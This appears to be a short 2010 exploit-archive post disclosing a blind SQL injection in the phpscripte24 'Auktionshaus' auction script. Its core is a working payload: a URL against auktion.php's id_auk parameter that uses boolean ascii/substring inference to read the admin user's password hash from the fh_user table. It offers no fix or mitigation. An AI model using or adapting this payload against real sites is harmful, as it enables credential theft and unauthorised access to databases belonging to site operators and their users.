phpscripte24 Auktionshaus Community Standart System SQL Inje

Posted on 17 March 2010

=======================================================================
phpscripte24 Auktionshaus Community Standart System Blind SQL Injection
=======================================================================

----------------------------Information------------------------------------------------
+Name : phpscripte24 Auktionshaus Community Standart System Blind SQL Injection
+Autor : Easy Laster
+Date   : 16.03.2010
+Script  : phpscripte24 Auktionshaus Community Standart System
+Price : ? 139.99
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktion/auktion.php?id_auk=
 
#password md5
+Exploitable   : http://server/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
 
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

None in database

Last 20

Exploits :

Last 20